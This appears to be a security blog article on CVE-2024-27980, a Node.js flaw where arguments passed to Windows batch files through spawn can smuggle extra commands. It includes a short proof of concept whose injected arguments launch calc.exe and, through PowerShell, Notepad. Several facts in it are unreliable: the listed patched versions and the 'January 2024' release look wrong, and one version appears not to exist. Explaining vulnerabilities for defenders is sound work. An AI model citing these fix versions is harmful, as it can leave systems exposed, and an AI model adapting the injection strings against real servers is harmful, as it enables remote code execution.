In early 2024, security researchers discovered a significant flaw in how Node.js handles batch files on Windows using the child_process.spawn and child_process.spawnSync methods. This vulnerability, now tracked as CVE-2024-27980, allows attackers to inject and execute arbitrary commands—even when the shell option is set to false. In this article, we’ll break down exactly how this works, show code examples, and link you to the original advisories and proof-of-concepts.
Node.js provides utilities to spawn child processes, like so
const { spawn } = require('child_process');
spawn('some-cmd.bat', ['arg1', 'arg2'], { shell: false });
The shell: false option is supposed to prevent command injection since the command shouldn’t be passed through a shell. However, due to an implementation flaw when calling Windows batch scripts, user-supplied arguments can break this promise.
The Core Issue
- On Windows, launching .bat or .cmd files—even without the shell option—internally relies on the Windows command interpreter.
Suppose you have a batch file, sayhello.bat, with harmless code
@echo off
echo Hello %1
And your server lets users choose the name for the greeting
const { spawn } = require('child_process');
function greetUser(name) {
spawn('sayhello.bat', [name], { shell: false });
}
greetUser('World'); // "Hello World"
Attack Scenario
What if a user sends a specially crafted argument?
greetUser('World & calc.exe &');
// This argument value: 'World & calc.exe &'
Because of improper argument handling, this will be interpreted as
sayhello.bat "World & calc.exe &"
PoC: Code Injection in Action
Try this on a vulnerable Node.js version (before the patch).
sayhello.bat
@echo off
echo Hello %1
exploit.js
const { spawn } = require('child_process');
spawn('sayhello.bat', ['Injected && powershell -Command "Start-Process notepad"'], { shell: false });
When you run node exploit.js, it will launch Notepad _(or any executable the attacker chooses)_ on the victim system—demonstrating full code execution.
Why is This So Dangerous?
* The exploitation does not require shell option to be enabled; it breaks the expectation of Node.js’s API.
* Any system launching batch files with user-controlled arguments is at risk.
* Impact: Remote Code Execution (RCE), data theft, lateral movement on Windows systems.
Mitigation and Official Fix
- Upgrade Node.js: The vulnerability is fixed in Node.js v18.19.1, v20.9.1, and v21.6.1.
- Escape User Input: Always validate or sanitize any argument passed to child processes—especially those involving batch files.
Official advisory:
- Node.js Security Release: January 2024
More References & Proof of Concept
- NIST NVD Entry for CVE-2024-27980
- Node.js Issue Tracker
- Original Patch
- Research Blog Post Explaining the Exploit
Never trust user input: Even if you think you are not using a shell.
- Keep dependencies and runtimes updated: Use supported Node.js versions, especially on Windows servers.
- Be wary of batch files: Avoid using them with user inputs; prefer native binaries or use strict validation.
CVE-2024-27980 is a great lesson in how platform-specific behavior can create dangerous vulnerabilities—even when APIs claim to be “safe.” Stay vigilant and patch early!
*Author: Security Researcher — 2024. Please share responsibly. For more reading, subscribe to our newsletter.*
Timeline
Published on: 01/09/2025 01:15:08 UTC